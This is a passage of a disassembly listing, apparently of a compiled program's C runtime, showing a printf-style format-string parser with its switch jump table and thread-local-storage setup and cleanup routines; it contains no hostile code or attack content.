loc_42DBE1: ; CODE XREF: sub_42DBAD+2A�j
cmp [ebp+var_14], edx
jl loc_42E2C6
cmp bl, 20h
jl short loc_42DC02
cmp bl, 78h
jg short loc_42DC02
movsx eax, bl
mov al, [eax+4374DCh]
and eax, 0Fh
jmp short loc_42DC04
; ---------------------------------------------------------------------------
loc_42DC02: ; CODE XREF: sub_42DBAD+40�j
; sub_42DBAD+45�j
xor eax, eax
loc_42DC04: ; CODE XREF: sub_42DBAD+53�j
movsx eax, byte_4374FC[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_42E2B5 ; default
jmp off_42E2CE[eax*4] ; switch jump
loc_42DC22: ; DATA XREF: .text:off_42E2CE�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 0042DC1B case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DC3D: ; CODE XREF: sub_42DBAD+6E�j
; DATA XREF: .text:off_42E2CE�o
movsx eax, bl ; jumptable 0042DC1B case 2
sub eax, 20h
jz short loc_42DC80
sub eax, 3
jz short loc_42DC77
sub eax, 8
jz short loc_42DC6E
dec eax
dec eax
jz short loc_42DC65
sub eax, 3
jnz loc_42E2B5 ; default
or [ebp+var_4], 8
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DC65: ; CODE XREF: sub_42DBAD+A4�j
or [ebp+var_4], 4
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DC6E: ; CODE XREF: sub_42DBAD+A0�j
or [ebp+var_4], 1
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DC77: ; CODE XREF: sub_42DBAD+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DC80: ; CODE XREF: sub_42DBAD+96�j
or [ebp+var_4], 2
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DC89: ; CODE XREF: sub_42DBAD+6E�j
; DATA XREF: .text:off_42E2CE�o
cmp bl, 2Ah ; jumptable 0042DC1B case 3
jnz short loc_42DCB1
lea eax, [ebp+arg_8]
push eax
call sub_42E38C
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_42E2B5 ; default
or [ebp+var_4], 4
neg eax
loc_42DCA9: ; CODE XREF: sub_42DBAD+111�j
mov [ebp+var_20], eax
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DCB1: ; CODE XREF: sub_42DBAD+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_42DCA9
; ---------------------------------------------------------------------------
loc_42DCC0: ; CODE XREF: sub_42DBAD+6E�j
; DATA XREF: .text:off_42E2CE�o
mov [ebp+var_10], edx ; jumptable 0042DC1B case 4
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DCC8: ; CODE XREF: sub_42DBAD+6E�j
; DATA XREF: .text:off_42E2CE�o
cmp bl, 2Ah ; jumptable 0042DC1B case 5
jnz short loc_42DCEB
lea eax, [ebp+arg_8]
push eax
call sub_42E38C
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_42E2B5 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DCEB: ; CODE XREF: sub_42DBAD+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DCFD: ; CODE XREF: sub_42DBAD+6E�j
; DATA XREF: .text:off_42E2CE�o
cmp bl, 49h ; jumptable 0042DC1B case 6
jz short loc_42DD30
cmp bl, 68h
jz short loc_42DD27
cmp bl, 6Ch
jz short loc_42DD1E
cmp bl, 77h
jnz loc_42E2B5 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DD1E: ; CODE XREF: sub_42DBAD+15D�j
or [ebp+var_4], 10h
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DD27: ; CODE XREF: sub_42DBAD+158�j
or [ebp+var_4], 20h
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DD30: ; CODE XREF: sub_42DBAD+153�j
cmp byte ptr [edi], 36h
jnz short loc_42DD49
cmp byte ptr [edi+1], 34h
jnz short loc_42DD49
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DD49: ; CODE XREF: sub_42DBAD+186�j
; sub_42DBAD+18C�j
mov [ebp+var_30], edx
loc_42DD4C: ; CODE XREF: sub_42DBAD+6E�j
; DATA XREF: .text:off_42E2CE�o
mov ecx, off_453398 ; jumptable 0042DC1B case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42DD78
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_42E2EE
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_42DD78: ; CODE XREF: sub_42DBAD+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_42E2EE
add esp, 0Ch
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42DD90: ; CODE XREF: sub_42DBAD+6E�j
; DATA XREF: .text:off_42E2CE�o
movsx eax, bl ; jumptable 0042DC1B case 7
cmp eax, 67h
jg loc_42DFB8
cmp eax, 65h
jge loc_42DE3B
cmp eax, 58h
jg loc_42DE99
jz loc_42E02C
sub eax, 43h
jz loc_42DE5C
dec eax
dec eax
jz short loc_42DE31
dec eax
dec eax
jz short loc_42DE31
sub eax, 0Ch
jnz loc_42E1B7
test word ptr [ebp+var_4], 830h
jnz short loc_42DDDA
or byte ptr [ebp+var_4+1], 8
loc_42DDDA: ; CODE XREF: sub_42DBAD+227�j
; sub_42DBAD+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_42DDE7
mov esi, 7FFFFFFFh
loc_42DDE7: ; CODE XREF: sub_42DBAD+233�j
lea eax, [ebp+arg_8]
push eax
call sub_42E38C
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_42E000
test ecx, ecx
jnz short loc_42DE0F
mov ecx, off_45321C
mov [ebp+var_8], ecx
loc_42DE0F: ; CODE XREF: sub_42DBAD+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_42DE18: ; CODE XREF: sub_42DBAD+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_42DFF7
cmp word ptr [eax], 0
jz loc_42DFF7
inc eax
inc eax
jmp short loc_42DE18
; ---------------------------------------------------------------------------
loc_42DE31: ; CODE XREF: sub_42DBAD+212�j
; sub_42DBAD+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_42DE3B: ; CODE XREF: sub_42DBAD+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_42DF1F
mov [ebp+var_10], 6
jmp loc_42DF2D
; ---------------------------------------------------------------------------
loc_42DE5C: ; CODE XREF: sub_42DBAD+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_42DE68
or byte ptr [ebp+var_4+1], 8
loc_42DE68: ; CODE XREF: sub_42DBAD+2B5�j
; sub_42DBAD+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_42DEAF
call sub_42E3A9
push eax
lea eax, [ebp+var_248]
push eax
call sub_433190
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_42DEC2
mov [ebp+var_28], 1
jmp short loc_42DEC2
; ---------------------------------------------------------------------------
loc_42DE99: ; CODE XREF: sub_42DBAD+1FB�j
sub eax, 5Ah
jz short loc_42DED0
sub eax, 9
jz short loc_42DE68
dec eax
jz loc_42E092
jmp loc_42E1B7
; ---------------------------------------------------------------------------
loc_42DEAF: ; CODE XREF: sub_42DBAD+2C5�j
call sub_42E38C
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_42DEC2: ; CODE XREF: sub_42DBAD+2E1�j
; sub_42DBAD+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_42E1B7
; ---------------------------------------------------------------------------
loc_42DED0: ; CODE XREF: sub_42DBAD+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_42E38C
test eax, eax
pop ecx
jz short loc_42DF11
mov ecx, [eax+4]
test ecx, ecx
jz short loc_42DF11
test byte ptr [ebp+var_4+1], 8
jz short loc_42DF02
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_42E1B7
; ---------------------------------------------------------------------------
loc_42DF02: ; CODE XREF: sub_42DBAD+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_42E1B4
; ---------------------------------------------------------------------------
loc_42DF11: ; CODE XREF: sub_42DBAD+32F�j
; sub_42DBAD+336�j
mov eax, off_453218
mov [ebp+var_8], eax
push eax
jmp loc_42DFAD
; ---------------------------------------------------------------------------
loc_42DF1F: ; CODE XREF: sub_42DBAD+29D�j
jnz short loc_42DF2D
cmp bl, 67h
jnz short loc_42DF2D
mov [ebp+var_10], 1
loc_42DF2D: ; CODE XREF: sub_42DBAD+2AA�j
; sub_42DBAD:loc_42DF1F�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call off_4537FC
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_42DF7F
cmp [ebp+var_10], 0
jnz short loc_42DF7F
lea eax, [ebp+var_248]
push eax
call off_453808
pop ecx
loc_42DF7F: ; CODE XREF: sub_42DBAD+3BC�j
; sub_42DBAD+3C2�j
cmp bl, 67h
jnz short loc_42DF96
test esi, esi
jnz short loc_42DF96
lea eax, [ebp+var_248]
push eax
call off_453800
pop ecx
loc_42DF96: ; CODE XREF: sub_42DBAD+3D5�j
; sub_42DBAD+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_42DFAC
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_42DFAC: ; CODE XREF: sub_42DBAD+3F0�j
push edi
loc_42DFAD: ; CODE XREF: sub_42DBAD+36D�j
call sub_4292D0
pop ecx
jmp loc_42E1B4
; ---------------------------------------------------------------------------
loc_42DFB8: ; CODE XREF: sub_42DBAD+1E9�j
sub eax, 69h
jz loc_42E092
sub eax, 5
jz loc_42E068
dec eax
jz loc_42E055
dec eax
jz short loc_42E025
sub eax, 3
jz loc_42DDDA
dec eax
dec eax
jz loc_42E096
sub eax, 3
jnz loc_42E1B7
mov [ebp+var_2C], 27h
jmp short loc_42E033
; ---------------------------------------------------------------------------
loc_42DFF7: ; CODE XREF: sub_42DBAD+270�j
; sub_42DBAD+27A�j
sub eax, ecx
sar eax, 1
jmp loc_42E1B4
; ---------------------------------------------------------------------------
loc_42E000: ; CODE XREF: sub_42DBAD+24F�j
test ecx, ecx
jnz short loc_42E00D
mov ecx, off_453218
mov [ebp+var_8], ecx
loc_42E00D: ; CODE XREF: sub_42DBAD+455�j
mov eax, ecx
loc_42E00F: ; CODE XREF: sub_42DBAD+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_42E01E
cmp byte ptr [eax], 0
jz short loc_42E01E
inc eax
jmp short loc_42E00F
; ---------------------------------------------------------------------------
loc_42E01E: ; CODE XREF: sub_42DBAD+467�j
; sub_42DBAD+46C�j
sub eax, ecx
jmp loc_42E1B4
; ---------------------------------------------------------------------------
loc_42E025: ; CODE XREF: sub_42DBAD+425�j
mov [ebp+var_10], 8
loc_42E02C: ; CODE XREF: sub_42DBAD+201�j
mov [ebp+var_2C], 7
loc_42E033: ; CODE XREF: sub_42DBAD+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_42E09D
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_42E09D
; ---------------------------------------------------------------------------
loc_42E055: ; CODE XREF: sub_42DBAD+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_42E09D
or byte ptr [ebp+var_4+1], 2
jmp short loc_42E09D
; ---------------------------------------------------------------------------
loc_42E068: ; CODE XREF: sub_42DBAD+417�j
lea eax, [ebp+arg_8]
push eax
call sub_42E38C
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_42E081
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_42E086
; ---------------------------------------------------------------------------
loc_42E081: ; CODE XREF: sub_42DBAD+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_42E086: ; CODE XREF: sub_42DBAD+4D2�j
mov [ebp+var_28], 1
jmp loc_42E2B5 ; default
; ---------------------------------------------------------------------------
loc_42E092: ; CODE XREF: sub_42DBAD+2F7�j
; sub_42DBAD+40E�j
or [ebp+var_4], 40h
loc_42E096: ; CODE XREF: sub_42DBAD+432�j
mov [ebp+var_C], 0Ah
loc_42E09D: ; CODE XREF: sub_42DBAD+491�j
; sub_42DBAD+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_42E0AF
lea eax, [ebp+arg_8]
push eax
call sub_42E399
pop ecx
jmp short loc_42E0F0
; ---------------------------------------------------------------------------
loc_42E0AF: ; CODE XREF: sub_42DBAD+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_42E0D6
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_42E0CB
call sub_42E38C
pop ecx
movsx eax, ax
loc_42E0C8: ; CODE XREF: sub_42DBAD+527�j
; sub_42DBAD+539�j
cdq
jmp short loc_42E0F0
; ---------------------------------------------------------------------------
loc_42E0CB: ; CODE XREF: sub_42DBAD+510�j
call sub_42E38C
pop ecx
movzx eax, ax
jmp short loc_42E0C8
; ---------------------------------------------------------------------------
loc_42E0D6: ; CODE XREF: sub_42DBAD+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_42E0E8
call sub_42E38C
pop ecx
jmp short loc_42E0C8
; ---------------------------------------------------------------------------
loc_42E0E8: ; CODE XREF: sub_42DBAD+531�j
call sub_42E38C
pop ecx
xor edx, edx
loc_42E0F0: ; CODE XREF: sub_42DBAD+500�j
; sub_42DBAD+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_42E111
test edx, edx
jg short loc_42E111
jl short loc_42E100
test eax, eax
jnb short loc_42E111
loc_42E100: ; CODE XREF: sub_42DBAD+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_42E115
; ---------------------------------------------------------------------------
loc_42E111: ; CODE XREF: sub_42DBAD+547�j
; sub_42DBAD+54B�j ...
mov esi, eax
mov edi, edx
loc_42E115: ; CODE XREF: sub_42DBAD+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_42E11E
and edi, 0
loc_42E11E: ; CODE XREF: sub_42DBAD+56C�j
cmp [ebp+var_10], 0
jge short loc_42E12D
mov [ebp+var_10], 1
jmp short loc_42E131
; ---------------------------------------------------------------------------
loc_42E12D: ; CODE XREF: sub_42DBAD+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_42E131: ; CODE XREF: sub_42DBAD+57E�j
mov eax, esi
or eax, edi
jnz short loc_42E13B
and [ebp+var_1C], 0
loc_42E13B: ; CODE XREF: sub_42DBAD+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_42E141: ; CODE XREF: sub_42DBAD+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_42E151
mov eax, esi
or eax, edi
jz short loc_42E18C
loc_42E151: ; CODE XREF: sub_42DBAD+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_42BD00
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_42BD80
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_42E182
add ebx, [ebp+var_2C]
loc_42E182: ; CODE XREF: sub_42DBAD+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_42E141
; ---------------------------------------------------------------------------
loc_42E18C: ; CODE XREF: sub_42DBAD+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_42E1B7
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_42E1AA
test eax, eax
jnz short loc_42E1B7
loc_42E1AA: ; CODE XREF: sub_42DBAD+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_42E1B4: ; CODE XREF: sub_42DBAD+35F�j
; sub_42DBAD+406�j ...
mov [ebp+var_C], eax
loc_42E1B7: ; CODE XREF: sub_42DBAD+21B�j
; sub_42DBAD+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_42E2B5 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_42E1EF
test bh, 1
jz short loc_42E1D4
mov [ebp+var_16], 2Dh
jmp short loc_42E1E8
; ---------------------------------------------------------------------------
loc_42E1D4: ; CODE XREF: sub_42DBAD+61F�j
test bl, 1
jz short loc_42E1DF
mov [ebp+var_16], 2Bh
jmp short loc_42E1E8
; ---------------------------------------------------------------------------
loc_42E1DF: ; CODE XREF: sub_42DBAD+62A�j
test bl, 2
jz short loc_42E1EF
mov [ebp+var_16], 20h
loc_42E1E8: ; CODE XREF: sub_42DBAD+625�j
; sub_42DBAD+630�j
mov [ebp+var_1C], 1
loc_42E1EF: ; CODE XREF: sub_42DBAD+61A�j
; sub_42DBAD+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_42E20F
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_42E323
add esp, 10h
loc_42E20F: ; CODE XREF: sub_42DBAD+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_42E354
add esp, 10h
test bl, 8
jz short loc_42E241
test bl, 4
jnz short loc_42E241
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_42E323
add esp, 10h
loc_42E241: ; CODE XREF: sub_42DBAD+67B�j
; sub_42DBAD+680�j
cmp [ebp+var_24], 0
jz short loc_42E288
cmp [ebp+var_C], 0
jle short loc_42E288
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_42E256: ; CODE XREF: sub_42DBAD+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_433190
pop ecx
test eax, eax
pop ecx
jle short loc_42E29D
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_42E354
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_42E256
jmp short loc_42E29D
; ---------------------------------------------------------------------------
loc_42E288: ; CODE XREF: sub_42DBAD+698�j
; sub_42DBAD+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_42E354
add esp, 10h
loc_42E29D: ; CODE XREF: sub_42DBAD+6BC�j
; sub_42DBAD+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_42E2B5 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_42E323
add esp, 10h
loc_42E2B5: ; CODE XREF: sub_42DBAD+68�j
; sub_42DBAD+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_42DBD9
loc_42E2C6: ; CODE XREF: sub_42DBAD+1F�j
; sub_42DBAD+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_42DBAD endp
; ---------------------------------------------------------------------------
off_42E2CE dd offset loc_42DD4C ; DATA XREF: sub_42DBAD+6E�r
dd offset loc_42DC22 ; jump table for switch statement
dd offset loc_42DC3D
dd offset loc_42DC89
dd offset loc_42DCC0
dd offset loc_42DCC8
dd offset loc_42DCFD
dd offset loc_42DD90
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E2EE proc near ; CODE XREF: sub_42DBAD+1BD�p
; sub_42DBAD+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_42E307
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_42E312
; ---------------------------------------------------------------------------
loc_42E307: ; CODE XREF: sub_42E2EE+9�j
push ecx
push [ebp+arg_0]
call sub_42DA95
pop ecx
pop ecx
loc_42E312: ; CODE XREF: sub_42E2EE+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_42E31F
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42E31F: ; CODE XREF: sub_42E2EE+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_42E2EE endp
; =============== S U B R O U T I N E =======================================
sub_42E323 proc near ; CODE XREF: sub_42DBAD+65A�p
; sub_42DBAD+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_42E351
mov esi, [esp+8+arg_C]
loc_42E334: ; CODE XREF: sub_42E323+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_42E2EE
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_42E351
mov eax, edi
dec edi
test eax, eax
jg short loc_42E334
loc_42E351: ; CODE XREF: sub_42E323+B�j
; sub_42E323+25�j
pop edi
pop esi
retn
sub_42E323 endp
; =============== S U B R O U T I N E =======================================
sub_42E354 proc near ; CODE XREF: sub_42DBAD+670�p
; sub_42DBAD+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_42E388
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_42E36A: ; CODE XREF: sub_42E354+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_42E2EE
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_42E388
mov eax, ebx
dec ebx
test eax, eax
jg short loc_42E36A
loc_42E388: ; CODE XREF: sub_42E354+C�j
; sub_42E354+2B�j
pop edi
pop esi
pop ebx
retn
sub_42E354 endp
; =============== S U B R O U T I N E =======================================
sub_42E38C proc near ; CODE XREF: sub_42DBAD+E5�p
; sub_42DBAD+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_42E38C endp
; =============== S U B R O U T I N E =======================================
sub_42E399 proc near ; CODE XREF: sub_42DBAD+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_42E399 endp
; =============== S U B R O U T I N E =======================================
sub_42E3A9 proc near ; CODE XREF: sub_42DBAD+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_42E3A9 endp
; =============== S U B R O U T I N E =======================================
sub_42E3B7 proc near ; CODE XREF: .text:loc_42C50F�p
push esi
call sub_42D9F6
call dword_43714C ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_453220, eax
jz short loc_42E407
push 74h
push 1
call sub_42B2CA
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_42E407
push esi
push dword_453220
call dword_437228 ; TlsSetValue
test eax, eax
jz short loc_42E407
push esi
call sub_42E40B
pop ecx
call dword_437150 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
push 1
mov [esi], eax
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_42E407: ; CODE XREF: sub_42E3B7+14�j
; sub_42E3B7+25�j ...
xor eax, eax
pop esi
retn
sub_42E3B7 endp
; =============== S U B R O U T I N E =======================================
sub_42E40B proc near ; CODE XREF: sub_42AAB1+16�p
; sub_42E3B7+39�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword ptr [eax+50h], offset dword_453818
mov dword ptr [eax+14h], 1
retn
sub_42E40B endp
; =============== S U B R O U T I N E =======================================
sub_42E41E proc near ; CODE XREF: sub_429ABF�p sub_429ACC�p ...
push esi
push edi
call dword_43716C ; RtlGetLastWin32Error
push dword_453220
mov edi, eax
call dword_437204 ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_42E479
push 74h
push 1
call sub_42B2CA
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_42E471
push esi
push dword_453220
call dword_437228 ; TlsSetValue
test eax, eax
jz short loc_42E471
push esi
call sub_42E40B
pop ecx
call dword_437150 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_42E479
; ---------------------------------------------------------------------------
loc_42E471: ; CODE XREF: sub_42E41E+2B�j
; sub_42E41E+3C�j
push 10h
call sub_42C5AC
pop ecx
loc_42E479: ; CODE XREF: sub_42E41E+1A�j
; sub_42E41E+51�j
push edi
call dword_437208 ; RtlSetLastWin32Error
mov eax, esi
pop edi
pop esi
retn
sub_42E41E endp
; =============== S U B R O U T I N E =======================================
sub_42E485 proc near ; CODE XREF: sub_42ABBB+2F�p
arg_0 = dword ptr 4
mov eax, dword_453220
cmp eax, 0FFFFFFFFh
jz locret_42E524
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_42E4A9
push eax
call dword_437204 ; TlsGetValue
mov esi, eax
test esi, esi
jz short loc_42E515
loc_42E4A9: ; CODE XREF: sub_42E485+15�j
mov eax, [esi+24h]
test eax, eax
jz short loc_42E4B7
push eax
call sub_429822
pop ecx
loc_42E4B7: ; CODE XREF: sub_42E485+29�j
mov eax, [esi+28h]
test eax, eax
jz short loc_42E4C5
push eax
call sub_429822
pop ecx
loc_42E4C5: ; CODE XREF: sub_42E485+37�j
mov eax, [esi+30h]
test eax, eax
jz short loc_42E4D3
push eax
call sub_429822
pop ecx
loc_42E4D3: ; CODE XREF: sub_42E485+45�j
mov eax, [esi+38h]
test eax, eax
jz short loc_42E4E1
push eax
call sub_429822
pop ecx
loc_42E4E1: ; CODE XREF: sub_42E485+53�j
mov eax, [esi+40h]
test eax, eax
jz short loc_42E4EF
push eax
call sub_429822
pop ecx
loc_42E4EF: ; CODE XREF: sub_42E485+61�j
mov eax, [esi+44h]
test eax, eax
jz short loc_42E4FD
push eax
call sub_429822
pop ecx
loc_42E4FD: ; CODE XREF: sub_42E485+6F�j
mov eax, [esi+50h]
cmp eax, offset dword_453818
jz short loc_42E50E
push eax
call sub_429822
pop ecx
loc_42E50E: ; CODE XREF: sub_42E485+80�j
push esi
call sub_429822
pop ecx
loc_42E515: ; CODE XREF: sub_42E485+22�j
push 0
push dword_453220
call dword_437228 ; TlsSetValue
pop esi
locret_42E524: ; CODE XREF: sub_42E485+8�j
retn
sub_42E485 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E525 proc near ; CODE XREF: sub_429D3E+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
